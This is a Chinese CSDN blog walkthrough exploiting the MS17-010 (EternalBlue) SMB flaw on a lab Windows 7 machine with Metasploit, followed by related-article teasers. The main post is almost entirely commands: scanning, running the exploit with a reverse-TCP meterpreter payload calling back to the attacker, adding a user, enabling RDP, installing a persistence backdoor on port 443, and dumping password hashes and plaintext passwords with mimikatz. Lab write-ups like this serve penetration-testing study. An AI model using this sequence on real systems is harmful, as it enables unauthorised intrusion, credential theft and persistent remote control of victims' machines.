445永痕之蓝利用

最新推荐文章于 2024-08-02 19:38:03 发布
最新推荐文章于 2024-08-02 19:38:03 发布
阅读量1.6k 收藏
点赞数 1
文章标签: 安全 网络 windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49176777/article/details/122083301
版权

arp-scan -l //扫描本地IP 分析得到靶机IP地址

nmap -A 192.168.232.131 扫描目标开放端口

发现目标开放445段端口

msfconsole //进入msfconsole

search ms17_010 //查找永恒之蓝攻击模块

0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption

1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution

3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection

先利用 永痕之蓝扫描工具探测目标是否有利用漏洞

use 3 //全写完太长了 直接use 3

show options //查看配置

set rhosts //设置目标IP地址

run

发现目标主机存在利用漏洞 直接利用exp进行攻击

返回上一级目录

use 0 // 0 = exploit/windows/smb/ms17_010_eternalblue

set payload windows/x64/meterpreter/reverse_tcp //设置荷载 成功之后会反向连接到本地

set rhosts // 设置目标地址

set lhost //设置本地地址

run

成功打进去

run post/windows/gather/checkvm //检查是否为虚拟机

getuid //检查权限

sysinfo //查看主机信息

run post/windows/manage/enable_rdp username=123 password=123 //添加一个账号密码为123的用户(默认为administrator)

shell >>>net user //查看用户是否添加

run post/windows/gather/enum_applications //查看安装软件

run post/multi/recon/local_exploit_suggester //获取补丁信息

run persistence -U -i 10 -p 443 -r 192.168.232.128//创建一个端口443 IP地址为 192.168.232.128 通讯刷新时间为10秒 同时添加启动项

background

use exploit/multi/handler //连接后门测试

set payload windows/meterpreter/reverse_tcp //设置payload反向连接

set lhost 192.168.232.128 //设置上线地址

set LPORT 443 //设置上线端口 跟上面监听端口一样

获取W7密码

apt-get install mimikatz //安装mimikatz

load mimikatz //加载模块

msv //获取登录密码的hash值

kerberos //获取明文密码

进入shell

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

rdesktop 192.168.1.128 -u Administrator -p ms17-010! //连接w7

MoYuSec_
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
永恒之蓝漏洞原理及利用
qq_41679358的博客
08-16 2万+
本文转自行云博客https://www.xy586.top/ 文章目录摘要前提需要原理漏洞利用 摘要 什么是永恒之蓝 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通.
永恒之蓝实验工具.rar
07-19
最原始的利用版本
永恒之蓝 利用(复现)
nszmsjhshs的博客
03-11 6564
永恒之蓝早在2017年4月15日黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”是利用Windows系统的SMB(445)漏洞可以跳过密码直接获取系统最高权限。这还没让我们对它得到重视,然而随后发生的一件事让它就此名声大噪或者说臭名昭著,那就是用它加以改造的wannacry 勒索病毒。它刚一出现就引起波然大动,全球各国都有地方受到攻击。被袭击的设备被锁定,并索要300美元比特币赎金。要求尽快支付勒索赎金,否则将删除文件,甚至提出半年后如果还没支
永痕小实验
m0_64361111的博客
01-13 3555
利用永恒之蓝漏洞 控制主机 实验条件:一台kali虚拟机(攻击机) 一台Windows7 虚拟机(靶机) 步骤: 打开两台虚拟机 记住两台虚拟机的IP地址 打开kali终端root权限,利用kali自带工具metasploitframework 进行入侵 点开以后是这样的 图片不固定 后面显示msf6就行 输入 代码 扫描命令:use auxiliary/scanner/smb/smb_ms17_010 设置扫描的主机:set rhosts 192.168...
永恒之蓝 (EternalBlue) 漏洞利用原理详解
volta_xu的博客
06-02 959
SMB(Server Message Block)协议是一种网络文件共享协议,主要用于文件和打印机共享。SMB协议允许客户端通过网络访问服务器上的文件、目录和其他资源。在Windows中,SMB协议是默认启用的,用于提供文件共享服务。
MS17-010 永恒之蓝漏洞利用方式
weixin_51339377的博客
03-17 6758
Eternal blue永恒之蓝漏洞 windows操作系统漏洞 借助工具Metasploit复现漏洞 利用条件: 1.目标计算机开启445端口 2.一般适用计算机系统 windows7 或windows server2008 R2 攻击机器:kali-Linux 192.168.109.130 目标靶机:windows7 192.168.109.129 1.在黑客机器中对目标计算机进行端口的扫描 发现目标445端口处于开放状态 nmap -p 80,3...
MS17-010永恒之蓝漏洞利用
lzj20060418的博客
05-06 254
靶机系统为:windows server 2008 R2 ip:192.168.100.218。攻击机系统为:linux-kali ip:192.168.100.99。成功渗透,进入到了meterpreter可以做的事情就非常多了。Windows xp系统利用永恒之蓝有所不同,需更换模块。首先使用nmap工具进行端口扫描是否存在445端口。可以发现已经开启了445端口,那么开始渗透。需使用该模块,其他的步骤一样。
永恒之蓝漏洞利用攻击以及修复方法
Gjqhs的博客
12-12 6984
MS17-010(Eternal blue永恒之蓝)漏洞利用+修复方法 前言 0x01 准备工作 0x02 漏洞利用 0x03 修复方案 总结 前言 提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生。 该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的危险漏洞“EternalBlue”(永恒之蓝)进行传播 。勒索病毒肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了.
MS17-010永恒之蓝漏洞的简谈与利用
qq_39120795的博客
11-12 4187
MS17-010是一个安全类型的补丁。 MS17-010更新修复了 Microsoft Windows中的漏洞。 如果攻击者向 Microsoft 服务器消息块 1.0 (SMBv1) 服务器发送经特殊设计的消息,则其中最严重的漏洞可能允许远程代码执行。 于4月14号发出安全公告《Microsoft 安全公告 MS17-010 - 严重》 以下软件版本都受到影响。未列出的版本表明其支持生命周期已结束或不受影响。若要确定软件版本的支持生命周期,请参阅Microsoft 支持生命周期。 对每个受影响软件
kali Linux——永恒之蓝复刻
sparkleqs的博客
05-16 1997
Metasploit Framework 是一个功能强大的开源安全漏洞检测工具,用于编写、测试和使用 exploit 代码,广泛应用于渗透测试、shellcode 编写和漏洞研究。该框架主要采用面向对象的 Ruby 编程语言编写,并包含由 C 语言、汇编语言和 Python 编写的可选组件。最初的 Metasploit 是用 Perl 编写的,但在后来的版本中改为使用 Ruby 编写。
MS1710永恒之蓝漏洞利用
07-07
MS1710永恒之蓝漏洞利用
避免永恒之蓝病毒,关闭445等危险端口
02-01
避免永恒之蓝病毒,关闭445等危险端口。修改文件后缀为bat,右键以管理员身份运行即可。
永恒之蓝 屏蔽135-139、445、3389端口脚本
10-15
针对永恒之蓝漏洞,自动导入IP安全策略的脚本屏蔽135-139、445、3389端口,对脚本进行优化,解决了以管理员权限运行脚本时,默认路径是"C:\Windows\system32>" 导致命令找不到策略文件,导入策略失败的问题。...
清除永恒之蓝mssecsvc病毒
05-22
清除永恒之蓝mssecsvc病毒,故障前 Netstat –na 发现有大量的外网445会话 结束mssecsvc.exe进程以后 将此服务启动类型修改为“禁用” 然后停止服务 删除以下文件: mssecsvc.exe Qeriuwjhrf Q6gynk6tjy13Y.85oyw ...
鸿蒙系统开发【加解密算法库框架】安全
2301_76813281的博客
08-02 833
本示例使用@ohos.security.cryptoFramework相关接口实现了对文本文件的加解密、签名验签操作。
发送邮箱调用接口时需要注意哪些安全事项?
DengHua2203的博客
08-02 384
发送邮箱调用接口时,确保安全性是一个复杂而重要的任务。通过以上措施,可以显著提高接口的安全性。AokSend,发送邮箱调用接口,API与SMTP无缝对接,一键触发,邮件秒达,营销快人一步!
鸿蒙系统开发【ASN.1密文转换】安全
最新发布
2301_76813281的博客
08-02 641
本示例对使用@kit.CryptoArchitectureKit加密后的密文格式进行转换。@kit.CryptoArchitectureKit加密后的密文格式默认为以base64显示的ASN.1格式问题,通过对密文进行base64变换后得到字符数组,以16进制数字显示,再此基础上进行密文格式转换,从ASN.1格式转换为c1c3c2格式的裸密文,再以c1c3c2格式的裸密文进行解密,以验证密文转换的正确性。
访问网站显示不安全怎么办?
joySSL_的博客
08-02 600
如果您还在使用http协议,那基本上所有的主流浏览器都是都不安全提示需要给网站安装部署一个SSL证书,有预算的话可以使用付费SSL证书,没有预算的话免费SSL证书也可以实现HTTPS。网站的SSL证书过期,或者域名不匹配,解决方式是点击右上角锁头标志查看证书,检查和更新证书,确保它有效、完整。网站被举报含有钓鱼、欺诈等非法问题,解决方法是联系报告方,证明网站已安全,同时全面检查网站,清除隐患。访问网站时显示“不安全”,针对不同的原因有不同的解决方式,下面是常见的几种原因和对应的解决办法。
msf怎么利用永恒之蓝
06-10
永恒之蓝是指微软Windows操作系统SMBv1协议的漏洞,可以通过Metasploit框架中的EternalBlue exploit模块进行利用。以下是利用永恒之蓝漏洞的一些基本步骤: 1. 启动msfconsole:在终端中输入msfconsole并按Enter键...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值